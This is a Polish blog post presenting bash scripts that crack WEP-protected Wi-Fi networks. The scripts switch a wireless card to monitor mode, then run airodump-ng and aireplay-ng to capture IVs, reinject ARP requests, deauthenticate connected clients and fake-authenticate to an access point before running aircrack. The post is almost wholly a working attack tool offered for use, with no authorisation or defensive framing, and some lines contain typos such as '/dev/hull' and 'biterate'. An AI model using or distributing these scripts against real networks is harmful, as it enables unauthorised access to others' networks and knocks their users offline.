Skrypt łamiący WEP

Skrypt pomagający złamać zabezpieczenie sieci wifi – WEP

1. Przełączanie karty WiFi do trybu monitor mode:

#! /bin/bash -x
x=wlan0
wlanconfig $x destroy
wlanconfig $x create wlandev wifi0 wlanmode managed
#ifconfig $x hw ether ca:fe:ca:fe:ca:fe
ifconfig $x up
#! /bin/bash -x
wlanconfig athX destroy
wlanconfig athX create wlandev wifi0 wlanmode monitor

 

2. Łamanie WEP

#! /bin/bash

clear
echo " wpisz interfaejs sieciowy np; ath0"
read athx
echo " wprowadzam karte $athx w stan monitor"
if
wlanconfig $athx destroy
wlanconfig $athx create wlandev wifi0 wlanmode monitor > /dev/null
ifconfig $athx up
then
echo " karta $athx monitor mode enable"
else
echo " jakis "error" sprawdz ustawienia karty"
echo " byc moze nie obsluguje monitor mode"
fi
clear
echo " wpisz odpowiedni bitrate dla karty np; 1, 11 , 54"
read bit > /dev/null
M=M
iwconfig $athx biterate $bit$M
clear
echo " uruchamiam airodump-ng -c 0 --ivs -w pakiety $athx"
echo " wylukaj co i jak jak skonczysz wcisnij "ctrl-c""
echo " aby kontynulowac ;enter"
read enter > /dev/null
airodump-ng --ivs -w pakiety $athx

echo " 1. Przeprowadz atak na ap z clientosami"
echo " 2. Przeprowadz atak na ap bez clientosow"
read y > /dev/null
clear
case $y in 1)
echo " uruchamiam airodumpa wpisz odpowiednoi kanal"
read kanal > /dev/hull
clear
aterm -geometry 65x15 -e airodump-ng -c $kanal --ivs -w pakiety $athx &

echo " uruchamiam ARP-request reinjection"
echo " uruchamiam deauthentication"
echo " wpisz mac apka"
read macap > /dev/null
clear
echo " wpisz mac clienta"
read client > /dev/null
clear
aterm -geometry 72x15 -e aireplay-ng -3 -b $macap -h $client $athx &
aterm -geometry 72x15 -e aireplay-ng -0 100 -a $macap -c $client $athx &
clear
echo " ...,,..,,...,,..,,..,,..,,..,,..,"
echo " ,zbieraj pakietsy & run aircarck."
echo " .,..,,..,,..,,..,,..,,..,,..,,.,,"
echo " mormo one person squad ;P"
read enter
esac
case $y in 2 )
echo " uruchamiam airodumpa wpisz odpowiednoi kanal"
read kanal2 > /dev/hull
clear
aterm -geometry 65x15 -e airodump-ng -c $kanal2 --ivs -w pakiety $athx &

echo " uruchamiam ARP-request reinjection"
echo " uruchamiam fake-clientos"
echo " wpisz mac apka"
read macap2 > /dev/null
echo " wpisz mac fake clienta"
read fake
echo "wpisz essid apka"
read essid

aterm -geometry 72x15 -e aireplay-ng -3 -b $macap2 -h $fake $athx &
aterm -geometry 72x15 -e aireplay-ng -1 0 -e $essid -a $macap2 -h $fake $athx &

clear
echo " ...,,..,,...,,..,,..,,..,,..,,..,"
echo " ,zbieraj pakietsy & run aircarck."
echo " .,..,,..,,..,,..,,..,,..,,..,,.,,"
echo " mormo one person squad ;P"

esac

 

Share Button

Przemek

Twórca portalu techfreak, elektronik, pasjonat wszystkiego co fajnie, co można przerobić. W wolnym czasie grzebie przy nettemp. A sport jaki uprawia to mini drony klasy 250.